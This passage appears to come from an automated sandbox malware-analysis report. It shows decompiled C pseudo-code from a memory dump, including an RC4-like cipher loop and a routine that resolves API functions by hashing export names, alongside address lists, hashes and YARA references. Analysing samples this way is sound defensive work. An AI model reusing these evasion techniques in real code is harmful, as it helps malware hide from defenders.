						} else {
							_t333[2] = _t291;
							do {
								_t265 = _t263 & 0x000000ff;
								_t200 =  *(_t333 + _t265 + 0x13c) & 0x000000ff;
								_t327 = _t327 + _t200 & 0x000000ff;
								 *(_t333 + _t265 + 0x13c) =  *(_t333 + _t327 + 0x13c) & 0x000000ff;
								_t263 = _t265 + 1;
								 *(_t333 + _t327 + 0x13c) = _t200;
								 *((char*)(_t307 + _t333[1])) =  *(_t307 + _t333[0x8f]) & 0x000000ff;
								_t307 = _t307 + 1;
							} while (_t307 < _t216);
						}
						_t291 = _t333[2];
					}
				}
				_t184 = E003C9640( &(_t333[0xc]), 0);
				E003C9710(_t291, _t184, E003C9650( &(_t333[0xb])));
				E003C9510( &(_t333[0xb]));
				E003C9510( &(_t333[3]));
				return _t291;
			}

0x003cd18c
0x003cd193
0x003cd195
0x003cd19e
0x003cd1a1
0x003cd1b1
0x003cd1bc
0x003cd1d0
0x003cd1dc
0x003cd1ee
0x003cd1f2
0x003cd209
0x003cd21c
0x003cd20b
0x003cd217
0x003cd217
0x003cd21e
0x003cd225
0x003cd228
0x003cd22d
0x003cd235
0x003cd23c
0x003cd23d
0x003cd244
0x003cd246
0x003cd24a
0x003cd250
0x003cd250
0x003cd261
0x003cd274
0x003cd278
0x003cd27c
0x003cd285
0x003cd28d
0x003cd291
0x003cd292
0x003cd296
0x003cd29e
0x003cd2a3
0x003cd2a6
0x003cd2af
0x003cd2b3
0x003cd2b6
0x003cd2c1
0x003cd2c7
0x003cd2d1
0x003cd2d8
0x003cd2d8
0x003cd2da
0x003cd2e1
0x003cd2eb
0x003cd2ee
0x003cd2f7
0x003cd2fb
0x003cd2ff
0x003cd30a
0x003cd30d
0x003cd317
0x003cd31e
0x003cd31e
0x003cd320
0x003cd327
0x003cd32e
0x003cd331
0x003cd339
0x003cd33d
0x003cd340
0x003cd34b
0x003cd34e
0x003cd358
0x003cd35f
0x003cd35f
0x003cd361
0x003cd368
0x003cd36f
0x003cd372
0x003cd379
0x003cd37d
0x003cd388
0x003cd38b
0x003cd395
0x003cd39c
0x003cd39c
0x003cd39e
0x003cd39e
0x003cd3b3
0x003cd3bb
0x003cd3c5
0x003cd3cd
0x003cd3d2
0x003cd3d7
0x003cd3de
0x003cd3e9
0x003cd3fd
0x003cd402
0x003cd407
0x003cd417
0x003cd424
0x003cd42a
0x003cd462
0x003cd475
0x003cd464
0x003cd470
0x003cd470
0x003cd477
0x003cd47e
0x003cd481
0x003cd486
0x003cd491
0x003cd495
0x003cd496
0x003cd49e
0x003cd4a0
0x003cd4a4
0x003cd4b0
0x003cd4b0
0x003cd4c1
0x003cd4d4
0x003cd4db
0x003cd4e2
0x003cd4ee
0x003cd4f9
0x003cd500
0x003cd501
0x003cd508
0x003cd510
0x003cd516
0x003cd51c
0x003cd51e
0x003cd525
0x003cd527
0x003cd573
0x003cd577
0x003cd580
0x003cd580
0x003cd58a
0x003cd594
0x003cd5a2
0x003cd5a9
0x003cd5c1
0x003cd5d0
0x003cd5d3
0x003cd5d4
0x003cd529
0x003cd529
0x003cd530
0x003cd530
0x003cd53a
0x003cd544
0x003cd552
0x003cd559
0x003cd55a
0x003cd569
0x003cd56c
0x003cd56d
0x003cd571
0x003cd5d8
0x003cd5d8
0x003cd516
0x003cd5e2
0x003cd5f6
0x003cd5ff
0x003cd608
0x003cd619

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c4affb0b97e9a92ad5c319a7318a59f7f89af0f3b98c73a12dbfb66936e14af
Instruction ID: 45bc7ebe2a556d8b936710d125c3e225d24c13834e89f98f23962a9fbf5331dd
Opcode Fuzzy Hash: 2c4affb0b97e9a92ad5c319a7318a59f7f89af0f3b98c73a12dbfb66936e14af
Instruction Fuzzy Hash: A2D1B33110D3E48AC326AB2A9450BBFFFD15FD6304F198C7EA4C597282D578CA45DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 003C3B00, Relevance: .3, Instructions: 307
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E003C3B00(unsigned int* __ecx, intOrPtr* _a4) {
				intOrPtr _v20;
				intOrPtr* _v24;
				unsigned int _v28;
				signed int _v32;
				char* _v36;
				signed int _v40;
				signed int _v44;
				char* _v48;
				unsigned int _v52;
				unsigned int _t119;
				void* _t123;
				signed int* _t124;
				char* _t125;
				char _t128;
				signed int _t129;
				unsigned int _t135;
				signed int _t139;
				signed int _t140;
				char* _t143;
				char* _t144;
				char _t147;
				char _t150;
				signed int _t151;
				unsigned int _t154;
				unsigned int _t157;
				signed int _t158;
				intOrPtr* _t163;
				signed int _t165;
				unsigned int _t166;
				unsigned int _t168;
				intOrPtr _t169;
				char* _t171;
				signed int _t173;
				unsigned int _t179;
				signed int _t181;
				char* _t182;
				char _t184;
				char _t185;
				unsigned int _t190;
				intOrPtr _t195;
				intOrPtr* _t196;
				signed int _t198;
				char* _t199;
				char _t200;
				char _t201;
				signed int _t207;
				signed int _t208;
				unsigned int _t209;
				unsigned int _t210;
				signed int _t212;
				intOrPtr* _t214;
				intOrPtr* _t216;
				char* _t217;
				void* _t218;
				intOrPtr _t219;
				signed int _t220;
				void* _t222;

				_t222 = (_t220 & 0xfffffff0) - 0x24;
				_t214 = __ecx;
				_t163 = _a4;
				if(_t163 == __ecx) {
					L68:
					return _t214;
				}
				_t168 =  *__ecx;
				 *__ecx = 0;
				__ecx[2] = 0;
				_t190 = __ecx[1];
				if(_t168 <= 0) {
					L13:
					_push(4);
					_push(_t190);
					E003B10B0();
					_t222 = _t222 + 8;
					_t169 =  *_t163;
					 *(_t214 + 4) = 0;
					if(_t169 == 0) {
						goto L68;
					}
					_t207 = (_t169 - 0x00000001 >> 0x00000001 >> 0x0000001e) + _t169 - 0x00000001 & 0xfffffffc;
					_push(0x10 + _t207 * 4);
					 *((intOrPtr*)(_t214 + 8)) = _t207 + 4;
					_t119 = E003B1030();
					_t222 = _t222 + 4;
					_t195 =  *_t163;
					 *(_t214 + 4) = _t119;
					 *_t214 = _t195;
					if(_t195 <= 0) {
						goto L68;
					}
					_v20 = _t214;
					_t208 = 0;
					asm("pxor xmm0, xmm0");
					do {
						_push(8);
						_t208 = _t208 + 1;
						_t216 = E003B1030();
						_t222 = _t222 + 4;
						if(_t216 == 0) {
							_t216 = 0;
							_t165 = _t208 * 4;
							goto L66;
						}
						_t123 = _t208 - 1;
						if(_t123 < 0 || _t123 >=  *_a4) {
							_t124 = 0;
							_t165 = _t208 * 4;
						} else {
							_t165 = _t208 * 4;
							_t124 =  *( *((intOrPtr*)(_a4 + 4)) + _t165 - 4);
						}
						 *_t216 = 0;
						 *(_t216 + 4) = 0;
						_t198 =  *_t124;
						if(_t198 == 0 ||  *_t198 == 0) {
							_push(0x40);
							_t125 = E003B1030();
							_v52 = _t125;
							_t222 = _t222 + 4;
							_t199 =  *_t216;
							if(_t199 == 0) {
								 *_t125 = 0;
								L64:
								 *_t216 = _v52;
								 *(_t216 + 4) = 0x40;
								goto L66;
							}
							if(_v52 == 0) {
								L62:
								_push(1);
								_push(_t199);
								E003B10B0();
								_t222 = _t222 + 8;
								goto L64;
							}
							_t171 = _t125;
							_t128 =  *_t199;
							 *_t171 = _t128;
							if(_t128 == 0) {
								goto L62;
							}
							_v24 = _t216;
							_t129 = 0;
							_v32 = _t208;
							_t217 = _t171;
							while(1) {
								_t129 = _t129 + 1;
								_t184 =  *((char*)(_t199 + _t129 * 2 - 1));
								 *((char*)(_t217 + _t129 * 2 - 1)) = _t184;
								if(_t184 == 0) {
									break;
								}
								_t185 =  *((char*)(_t199 + _t129 * 2));
								 *((char*)(_t217 + _t129 * 2)) = _t185;
								if(_t185 != 0) {
									continue;
								}
								break;
							}
							_t216 = _v24;
							_t208 = _v32;
							goto L62;
						} else {
							_t173 = _t198 & 0x0000000f;
							if(_t173 == 0) {
								L27:
								asm("pxor xmm1, xmm1");
								_t135 =  ~( ~_t173 + 0x0000000f & 0x0000000f) + 0x7fffffff;
								_v28 = _t135;
								_v32 = _t208;
								_t209 = _t135;
								while(1) {
									asm("movdqu xmm0, [edx+ecx]");
									asm("pcmpeqb xmm0, xmm1");
									asm("pmovmskb eax, xmm0");
									if(_t135 != 0) {
										break;
									}
									_t173 = _t173 + 0x10;
									if(_t173 < _t209) {
										continue;
									}
									_v28 = _t209;
									_t208 = _v32;
									if(_v28 >= 0x7fffffff) {
										L34:
										_v28 = 0x7fffffff;
										L35:
										_t139 =  <=  ? 0x40 : _v28 + 1;
										if(_t139 > 0) {
											_t179 = (_t139 >> 5 >> 0x1a) + _t139 >> 6;
											_v40 = _t179;
											_t140 = _t139 & 0x8000003f;
											if(_t140 < 0) {
												_t140 = (_t140 - 0x00000001 | 0xffffffc0) + 1;
											}
											_t181 = _t179 + (0 | _t140 > 0x00000000) << 6;
											_v40 = _t181;
											_push(_t181);
											_v44 = _t198;
											_t143 = E003B1030();
											_t198 = _v44;
											_t182 = _t143;
											_t222 = _t222 + 4;
											_t144 =  *_t216;
											_v36 = _t144;
											if(_t144 == 0) {
												 *_t182 = 0;
												goto L48;
											} else {
												if(_t182 == 0) {
													L46:
													_push(1);
													_push(_v36);
													_v48 = _t182;
													_v44 = _t198;
													E003B10B0();
													_t198 = _v44;
													_t182 = _v48;
													_t222 = _t222 + 8;
													L48:
													 *(_t216 + 4) = _v40;
													 *_t216 = _t182;
													L49:
													if(_t182 == 0) {
														goto L66;
													}
													_v32 = _t208;
													_v24 = _t216;
													_t218 = 0;
													_t210 = _v28;
													while(1) {
														_t218 = _t218 + 1;
														_t147 =  *((char*)(_t218 + _t198 - 1));
														 *((char*)(_t218 + _t182 - 1)) = _t147;
														if(_t210 != 0 && _t218 == _t210) {
															break;
														}
														if(_t147 != 0) {
															continue;
														}
														_t216 = _v24;
														_t208 = _v32;
														goto L66;
													}
													_t216 = _v24;
													_t208 = _v32;
													 *((char*)(_t218 + _t182)) = 0;
													goto L66;
												}
												_t150 =  *_t144;
												 *_t182 = _t150;
												if(_t150 == 0) {
													goto L46;
												}
												_v24 = _t216;
												_t151 = 0;
												_v44 = _t198;
												_v32 = _t208;
												_t219 = _v36;
												while(1) {
													_t151 = _t151 + 1;
													_t200 =  *((char*)(_t219 + _t151 * 2 - 1));
													 *((char*)(_t182 + _t151 * 2 - 1)) = _t200;
													if(_t200 == 0) {
														break;
													}
													_t201 =  *((char*)(_t219 + _t151 * 2));
													 *((char*)(_t182 + _t151 * 2)) = _t201;
													if(_t201 != 0) {
														continue;
													}
													break;
												}
												_t216 = _v24;
												_t198 = _v44;
												_t208 = _v32;
												goto L46;
											}
										}
										_t182 = 0;
										goto L49;
									}
									_t154 = _v28;
									while( *((char*)(_t154 + _t198)) != 0) {
										_t154 = _t154 + 1;
										if(_t154 < 0x7fffffff) {
											continue;
										}
										goto L34;
									}
									L70:
									_v28 = _t154;
									goto L35;
								}
								asm("bsf eax, eax");
								_t208 = _v32;
								_v28 = _t135 + _t173;
								goto L35;
							}
							_v28 = 0;
							_t154 = _v28;
							_t173 =  ~_t173 + 0x10;
							while( *((char*)(_t154 + _t198)) != 0) {
								_t154 = _t154 + 1;
								if(_t154 < _t173) {
									continue;
								}
								goto L27;
							}
							goto L70;
						}
						L66:
						_t196 = _v20;
						 *((intOrPtr*)(_t165 +  *((intOrPtr*)(_t196 + 4)) - 4)) = _t216;
					} while (_t208 <  *_t196);
					_t214 = _t196;
					goto L68;
				}
				_t157 = _t168 >> 1;
				if(_t157 == 0) {
					_t158 = 1;
					goto L10;
				} else {
					_v52 = _t168;
					_t212 = 0;
					_t166 = _t157;
					do {
						_t187 =  *((intOrPtr*)(_t190 + _t212 * 8));
						if( *((intOrPtr*)(_t190 + _t212 * 8)) != 0) {
							_push(1);
							E003B87B0(_t187);
							_t190 =  *(_t214 + 4);
						}
						_t188 =  *((intOrPtr*)(_t190 + 4 + _t212 * 8));
						if( *((intOrPtr*)(_t190 + 4 + _t212 * 8)) != 0) {
							_push(1);
							E003B87B0(_t188);
							_t190 =  *(_t214 + 4);
						}
						_t212 = _t212 + 1;
					} while (_t212 < _t166);
					_t168 = _v52;
					_t12 = _t212 + 1; // 0x2
					_t158 = _t212 + _t12;
					_t163 = _a4;
					L10:
					_t14 = _t158 - 1; // 0x1
					if(_t14 < _t168) {
						_t186 =  *((intOrPtr*)(_t190 + _t158 * 4 - 4));
						if( *((intOrPtr*)(_t190 + _t158 * 4 - 4)) != 0) {
							_push(1);
							E003B87B0(_t186);
							_t190 =  *(_t214 + 4);
						}
					}
					goto L13;
				}
			}

0x003c3b09
0x003c3b0c
0x003c3b0e
0x003c3b13
0x003c3e6e
0x003c3e79
0x003c3e79
0x003c3b1b
0x003c3b1d
0x003c3b1f
0x003c3b22
0x003c3b27
0x003c3b85
0x003c3b85
0x003c3b87
0x003c3b88
0x003c3b8d
0x003c3b90
0x003c3b92
0x003c3b9b
0x00000000
0x00000000
0x003c3bad
0x003c3bb7
0x003c3bbb
0x003c3bbe
0x003c3bc3
0x003c3bc6
0x003c3bc8
0x003c3bcb
0x003c3bcf
0x00000000
0x00000000
0x003c3bd5
0x003c3bd9
0x003c3bdb
0x003c3bdf
0x003c3bdf
0x003c3be1
0x003c3be7
0x003c3be9
0x003c3bee
0x003c3e50
0x003c3e52
0x00000000
0x003c3e52
0x003c3bf6
0x003c3bf7
0x003c3c00
0x003c3c02
0x003c3c0b
0x003c3c0e
0x003c3c18
0x003c3c18
0x003c3c1e
0x003c3c20
0x003c3c23
0x003c3c27
0x003c3de0
0x003c3de2
0x003c3de7
0x003c3deb
0x003c3dee
0x003c3df2
0x003c3e3f
0x003c3e42
0x003c3e45
0x003c3e47
0x00000000
0x003c3e47
0x003c3df8
0x003c3e32
0x003c3e32
0x003c3e34
0x003c3e35
0x003c3e3a
0x00000000
0x003c3e3a
0x003c3dfa
0x003c3dfc
0x003c3dff
0x003c3e03
0x00000000
0x00000000
0x003c3e05
0x003c3e09
0x003c3e0b
0x003c3e0f
0x003c3e11
0x003c3e11
0x003c3e12
0x003c3e17
0x003c3e1d
0x00000000
0x00000000
0x003c3e1f
0x003c3e23
0x003c3e28
0x00000000
0x00000000
0x00000000
0x003c3e28
0x003c3e2a
0x003c3e2e
0x00000000
0x003c3c36
0x003c3c38
0x003c3c3b
0x003c3c5d
0x003c3c61
0x003c3c6d
0x003c3c72
0x003c3c76
0x003c3c7a
0x003c3c7c
0x003c3c7c
0x003c3c81
0x003c3c85
0x003c3c8b
0x00000000
0x00000000
0x003c3c91
0x003c3c96
0x00000000
0x00000000
0x003c3c98
0x003c3c9c
0x003c3ca8
0x003c3cc0
0x003c3cc0
0x003c3cc8
0x003c3cd7
0x003c3cdc
0x003c3cef
0x003c3cf2
0x003c3cf6
0x003c3cfb
0x003c3d03
0x003c3d03
0x003c3d10
0x003c3d13
0x003c3d17
0x003c3d18
0x003c3d1c
0x003c3d21
0x003c3d25
0x003c3d27
0x003c3d2a
0x003c3d2c
0x003c3d32
0x003c3d98
0x00000000
0x003c3d34
0x003c3d36
0x003c3d78
0x003c3d78
0x003c3d7a
0x003c3d7e
0x003c3d82
0x003c3d86
0x003c3d8b
0x003c3d8f
0x003c3d93
0x003c3d9b
0x003c3d9f
0x003c3da2
0x003c3da4
0x003c3da6
0x00000000
0x00000000
0x003c3dae
0x003c3db2
0x003c3db6
0x003c3db8
0x003c3dbc
0x003c3dbc
0x003c3dbd
0x003c3dc2
0x003c3dc8
0x00000000
0x00000000
0x003c3dd4
0x00000000
0x00000000
0x003c3dd6
0x003c3dda
0x00000000
0x003c3dda
0x003c3e7e
0x003c3e82
0x003c3e86
0x00000000
0x003c3e86
0x003c3d38
0x003c3d3b
0x003c3d3f
0x00000000
0x00000000
0x003c3d41
0x003c3d45
0x003c3d47
0x003c3d4b
0x003c3d4f
0x003c3d53
0x003c3d53
0x003c3d54
0x003c3d59
0x003c3d5f
0x00000000
0x00000000
0x003c3d61
0x003c3d65
0x003c3d6a
0x00000000
0x00000000
0x00000000
0x003c3d6a
0x003c3d6c
0x003c3d70
0x003c3d74
0x00000000
0x003c3d74
0x003c3d32
0x003c3cde
0x00000000
0x003c3cde
0x003c3caa
0x003c3cae
0x003c3cb8
0x003c3cbe
0x00000000
0x00000000
0x00000000
0x003c3cbe
0x003c3e8c
0x003c3e8c
0x00000000
0x003c3e8c
0x003c3e95
0x003c3e9a
0x003c3e9e
0x00000000
0x003c3e9e
0x003c3c3d
0x003c3c47
0x003c3c4b
0x003c3c4e
0x003c3c58
0x003c3c5b
0x00000000
0x00000000
0x00000000
0x003c3c5b
0x00000000
0x003c3c4e
0x003c3e59
0x003c3e59
0x003c3e60
0x003c3e64
0x003c3e6c
0x00000000
0x003c3e6c
0x003c3b2b
0x003c3b2d
0x003c3ea7
0x00000000
0x003c3b33
0x003c3b33
0x003c3b36
0x003c3b38
0x003c3b3a
0x003c3b3a
0x003c3b3f
0x003c3b41
0x003c3b43
0x003c3b48
0x003c3b48
0x003c3b4b
0x003c3b51
0x003c3b53
0x003c3b55
0x003c3b5a
0x003c3b5a
0x003c3b5d
0x003c3b5e
0x003c3b62
0x003c3b65
0x003c3b65
0x003c3b69
0x003c3b6c
0x003c3b6c
0x003c3b71
0x003c3b73
0x003c3b79
0x003c3b7b
0x003c3b7d
0x003c3b82
0x003c3b82
0x003c3b79
0x00000000
0x003c3b71

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 769dd45fdfd1994aa2fcb50dbb8a97899a61763fb7daf8420eb3df3334b3789f
Instruction ID: 10abc509651eec4dc660bf0cbe85346063ee5a69ef60eef2a40caf1ff7fa4d1d
Opcode Fuzzy Hash: 769dd45fdfd1994aa2fcb50dbb8a97899a61763fb7daf8420eb3df3334b3789f
Instruction Fuzzy Hash: C8C1C1756087428BC716CF28C480B6ABBE1AF85700F19CA1DE996DB351D731EE45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 003B67C8, Relevance: .3, Instructions: 304
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E003B67C8(void* __eax, signed int __edx) {
				void* __ebp;
				intOrPtr _t100;
				signed short* _t103;
				void* _t110;
				intOrPtr _t120;
				intOrPtr _t121;
				short _t122;
				intOrPtr _t128;
				char _t131;
				char _t132;
				void* _t134;
				intOrPtr _t136;
				intOrPtr _t138;
				signed int _t140;
				intOrPtr _t141;
				char* _t143;
				intOrPtr _t145;
				intOrPtr _t151;
				signed int _t155;
				intOrPtr _t156;
				intOrPtr _t158;
				char _t159;
				void* _t160;
				intOrPtr _t161;
				void* _t167;
				void* _t169;
				intOrPtr _t175;
				void* _t177;
				signed int _t182;
				intOrPtr _t184;
				void* _t185;
				signed int _t186;
				short _t191;
				intOrPtr _t195;
				void* _t196;
				void* _t197;
				void* _t198;
				intOrPtr _t199;
				void* _t201;
				void* _t202;
				void* _t203;
				void* _t204;
				void* _t206;
				short* _t207;

				_t155 = __edx;
				_t207 = _t206 - 0xa4;
				_t134 = __eax;
				_t140 =  *0x3db1f4; // 0x2661568
				 *(_t207 + 0x8c) = __edx;
				if(_t140 == 0xc139578) {
					 *0x3db1f4 = 0;
					_t140 = 0;
				}
				if( *(_t207 + 0x8c) != 0xc0b67de0) {
					L4:
					if( *(_t207 + 0x8c) != 0x996e050f) {
						L6:
						if( *(_t207 + 0x8c) != 0xf271e04d) {
							L10:
							if(_t140 == 0) {
								L16:
								_t100 = 0;
								goto L17;
							} else {
								_t186 = _t155;
								do {
									_t204 = 0;
									_t169 = 0;
									while(_t186 !=  *((intOrPtr*)(_t169 + _t140 + 8))) {
										_t204 = _t204 + 1;
										_t169 = _t169 + 0x18;
										if(_t204 < 0x10) {
											continue;
										} else {
											goto L15;
										}
										goto L78;
									}
									_t100 =  *((intOrPtr*)(_t169 + _t140 + 0x14));
									goto L8;
									L15:
									asm("o16 nop [eax+eax]");
									_t7 = _t140 + 0x180; // 0x26890a8
									_t140 =  *_t7;
								} while (_t140 != 0);
								goto L16;
							}
						} else {
							_t100 =  *0x3db200;
							if(_t100 == 0x9ccb2c38) {
								goto L10;
							} else {
								goto L8;
							}
						}
					} else {
						_t100 =  *0x3db1fc;
						if(_t100 != 0x9156aa9d) {
							goto L8;
						} else {
							goto L6;
						}
					}
				} else {
					_t100 =  *0x3db1f8;
					if(_t100 != 0x8f061a77) {
						L8:
						if(_t100 == 0) {
							L17:
							if(_t134 == 0) {
								return 0;
							} else {
								_t156 =  *((intOrPtr*)(_t134 + 0x3c));
								 *((intOrPtr*)(_t207 + 0x88)) = _t100;
								_t141 =  *((intOrPtr*)(_t156 + _t134 + 0x78));
								_t158 =  *((intOrPtr*)(_t156 + _t134 + 0x7c)) + _t141;
								_t191 =  *((intOrPtr*)(_t141 + _t134 + 0x20)) + _t134;
								_t103 =  *((intOrPtr*)(_t141 + _t134 + 0x24)) + _t134;
								 *(_t207 + 0x9c) = _t103;
								if( *((intOrPtr*)(_t141 + _t134 + 0x18)) <= 0) {
									L27:
									 *((intOrPtr*)(_t207 + 0x88)) = 0;
									_t136 = 0;
									goto L28;
								} else {
									_t182 = 0;
									 *(_t207 + 0xa0) =  *(_t207 + 0x8c) ^ 0x38ba5c7b;
									 *(_t207 + 0x98) = _t103;
									 *((intOrPtr*)(_t207 + 0x94)) = _t158;
									 *((intOrPtr*)(_t207 + 0x90)) = _t141;
									do {
										_t182 = _t182 + 1;
										_t143 =  *((intOrPtr*)(_t191 + _t182 * 4 - 4)) + _t134;
										_t159 =  *_t143;
										 *((char*)(_t207 + 8)) = _t159;
										if(_t159 == 0) {
											_t160 = 0;
										} else {
											 *(_t207 + 4) = _t182;
											_t177 = 0;
											 *_t207 = _t191;
											while(1) {
												_t177 = _t177 + 1;
												_t203 = _t177 + _t177;
												_t131 =  *((char*)(_t143 + _t203 - 1));
												_t35 = _t177 - 1; // 0x0
												_t160 = _t177 + _t35;
												 *((char*)(_t207 + _t203 + 7)) = _t131;
												if(_t131 == 0) {
													break;
												}
												_t132 =  *((char*)(_t143 + _t203));
												_t160 = _t203;
												 *((char*)(_t207 + _t203 + 8)) = _t132;
												if(_t132 != 0) {
													continue;
												}
												break;
											}
											_t182 =  *(_t207 + 4);
											_t191 =  *_t207;
										}
										if(E003CD620(_t207 + 8, _t160) ==  *(_t207 + 0xa0)) {
											_t145 =  *((intOrPtr*)(_t207 + 0x90));
											 *((intOrPtr*)(_t207 + 0x88)) = 0;
											_t161 =  *((intOrPtr*)(_t207 + 0x94));
											_t195 =  *((intOrPtr*)( *((intOrPtr*)(_t145 + _t134 + 0x1c)) + _t134 + ( *( *(_t207 + 0x98)) & 0x0000ffff) * 4));
											if(_t195 < _t145 || _t195 >= _t161) {
												_t136 = _t134 + _t195;
												 *((intOrPtr*)(_t207 + 0x88)) = _t136;
												goto L44;
											} else {
												_t200 = _t207 + 8;
												 *((intOrPtr*)(_t207 + 8 - 4)) = _t207 + 8;
												_t122 = E003C6040(_t200, 0x7fffffff);
												 *_t207 = _t122;
												_t151 =  *0x3db1f4; // 0x2661568
												 *((short*)(_t207 + 2)) = _t122 + 1;
												if(_t151 == 0xc139578) {
													 *0x3db1f4 = 0;
													goto L37;
												} else {
													if(_t151 == 0) {
														L37:
														_push(0x588ab3ea);
														_t201 = E003B7564(0x588ab3ea);
														if(_t201 == 0) {
															if(E003B6C50(0x588ab3ea) != 0) {
																_push(0x588ab3ea);
																_t201 = E003B7564(0x588ab3ea);
															}
														}
														if(_t201 == 0) {
															goto L42;
														} else {
															_t207 = _t207 + 0xfffffff8;
															_t128 = E003B67C8(_t201, 0x8ef64f95);
															goto L40;
														}
													} else {
														do {
															_t202 = 0;
															_t167 = 0;
															while( *((intOrPtr*)(_t167 + _t151 + 8)) != 0x8ef64f95) {
																_t202 = _t202 + 1;
																_t167 = _t167 + 0x18;
																if(_t202 < 0x10) {
																	continue;
																} else {
																	goto L36;
																}
																goto L78;
															}
															_t128 =  *((intOrPtr*)(_t167 + _t151 + 0x14));
															if(_t128 != 0) {
																L40:
																if(_t128 == 0) {
																	L42:
																	_t136 =  *((intOrPtr*)(_t207 + 0x88));
																	L44:
																	if(_t136 != 0) {
																		if( *0x3db26c != 0) {
																			if( *(_t207 + 0x8c) != 0xc0b67de0) {
																				if( *(_t207 + 0x8c) == 0x996e050f) {
																					 *0x3db1fc = _t136;
																				}
																			} else {
																				 *0x3db1f8 = _t136;
																			}
																		} else {
																			_t138 =  *0x3db1f4; // 0x2661568
																			if(_t138 == 0) {
																				_push(0x184);
																				 *0x3db26c = 1;
																				_t138 = E003B1030();
																				_t207 = _t207 + 4;
																				if(_t138 != 0) {
																					_t184 = _t138;
																					_t196 = 0x10;
																					do {
																						E003C06A0(_t184, _t196, 0);
																						 *((intOrPtr*)(_t184 + 8)) = 0;
																						 *((intOrPtr*)(_t184 + 0x14)) = 0;
																						_t184 = _t184 + 0x18;
																						_t196 = _t196 - 1;
																					} while (_t196 != 0);
																					 *((intOrPtr*)(_t138 + 0x180)) = 0;
																				} else {
																					_t138 = 0;
																				}
																				 *0x3db1f4 = _t138;
																				 *0x3db26c = 0;
																			} else {
																				_t69 = _t138 + 0x180; // 0x26890a8
																				_t120 =  *_t69;
																				if(_t120 != 0) {
																					while(1) {
																						_t138 = _t120;
																						_t70 = _t120 + 0x180; // 0x2687e20
																						_t121 =  *_t70;
																						if(_t121 == 0) {
																							goto L50;
																						}
																						_t138 = _t121;
																						_t71 = _t121 + 0x180; // 0x2663d80
																						_t120 =  *_t71;
																						if(_t120 != 0) {
																							continue;
																						}
																						goto L50;
																					}
																				}
																			}
																			L50:
																			_t110 = 0;
																			_t197 = 0;
																			while( *((intOrPtr*)(_t197 + _t138 + 8)) != 0) {
																				_t110 = _t110 + 1;
																				_t197 = _t197 + 0x18;
																				if(_t110 < 0x10) {
																					continue;
																				} else {
																					_push(0x184);
																					_t175 = E003B1030();
																					_t207 = _t207 + 4;
																					if(_t175 != 0) {
																						_t199 = _t175;
																						_t185 = 0x10;
																						do {
																							E003C06A0(_t199, _t199, 0);
																							 *((intOrPtr*)(_t199 + 8)) = 0;
																							 *((intOrPtr*)(_t199 + 0x14)) = 0;
																							_t199 = _t199 + 0x18;
																							_t185 = _t185 - 1;
																						} while (_t185 != 0);
																						 *((intOrPtr*)(_t175 + 0x180)) = 0;
																					} else {
																						_t175 = 0;
																					}
																					 *((intOrPtr*)(_t175 + 0x14)) =  *((intOrPtr*)(_t207 + 0x88));
																					E003C0B30(_t175,  *((intOrPtr*)(_t207 + 0x88)), _t207 + 8);
																					 *(_t175 + 8) =  *(_t207 + 0x8c);
																					 *((intOrPtr*)(_t138 + 0x180)) = _t175;
																					_t136 =  *((intOrPtr*)(_t207 + 0x88));
																				}
																				goto L28;
																			}
																			_t198 = _t197 + _t138;
																			_t111 = _t207 + 8;
																			 *((intOrPtr*)(_t198 + 0x14)) =  *((intOrPtr*)(_t207 + 0x88));
																			E003C0B30(_t198,  *((intOrPtr*)(_t207 + 0x88)), _t111);
																			 *(_t198 + 8) =  *(_t207 + 0x8c);
																			_t136 =  *((intOrPtr*)(_t207 + 0x88));
																		}
																	}
																	L28:
																	return _t136;
																} else {
																	_push(_t207 + 0x88);
																	_push(0);
																	_push(_t207);
																	_push(_t134);
																	asm("int3");
																	return _t128;
																}
															} else {
																goto L37;
															}
															goto L78;
															L36:
															asm("o16 nop [eax+eax]");
															_t65 = _t151 + 0x180; // 0x26890a8
															_t151 =  *_t65;
														} while (_t151 != 0);
														goto L37;
													}
												}
											}
										} else {
											goto L26;
										}
										goto L78;
										L26:
										 *(_t207 + 0x98) =  &(( *(_t207 + 0x9c))[_t182]);
									} while (_t182 <  *((intOrPtr*)( *((intOrPtr*)(_t207 + 0x90)) + _t134 + 0x18)));
									goto L27;
								}
							}
						} else {
							return _t100;
						}
					} else {
						goto L4;
					}
				}
				L78:
			}

0x003b67c8
0x003b67cc
0x003b67d2
0x003b67d4
0x003b67da
0x003b67e7
0x003b67e9
0x003b67f3
0x003b67f3
0x003b6800
0x003b680e
0x003b6819
0x003b6827
0x003b6832
0x003b6851
0x003b6853
0x003b687e
0x003b687e
0x00000000
0x003b6855
0x003b6855
0x003b6857
0x003b6857
0x003b6859
0x003b685b
0x003b6865
0x003b6866
0x003b686c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b686c
0x003b6c36
0x00000000
0x003b686e
0x003b686e
0x003b6874
0x003b6874
0x003b687a
0x00000000
0x003b6857
0x003b6834
0x003b6834
0x003b683e
0x00000000
0x00000000
0x00000000
0x00000000
0x003b683e
0x003b681b
0x003b681b
0x003b6825
0x00000000
0x00000000
0x00000000
0x00000000
0x003b6825
0x003b6802
0x003b6802
0x003b680c
0x003b6840
0x003b6842
0x003b6880
0x003b6882
0x003b6c4b
0x003b6888
0x003b6888
0x003b688b
0x003b6892
0x003b689a
0x003b68a4
0x003b68a6
0x003b68a8
0x003b68b4
0x003b695e
0x003b695e
0x003b6969
0x00000000
0x003b68ba
0x003b68c1
0x003b68c9
0x003b68d0
0x003b68d7
0x003b68de
0x003b68e5
0x003b68e5
0x003b68ea
0x003b68ec
0x003b68ef
0x003b68f5
0x003b6c2f
0x003b68fb
0x003b68fb
0x003b68ff
0x003b6901
0x003b6904
0x003b6904
0x003b6905
0x003b6908
0x003b690d
0x003b690d
0x003b6911
0x003b6917
0x00000000
0x00000000
0x003b6919
0x003b691d
0x003b691f
0x003b6925
0x00000000
0x00000000
0x00000000
0x003b6925
0x003b6927
0x003b692b
0x003b692b
0x003b693e
0x003b697a
0x003b6981
0x003b699c
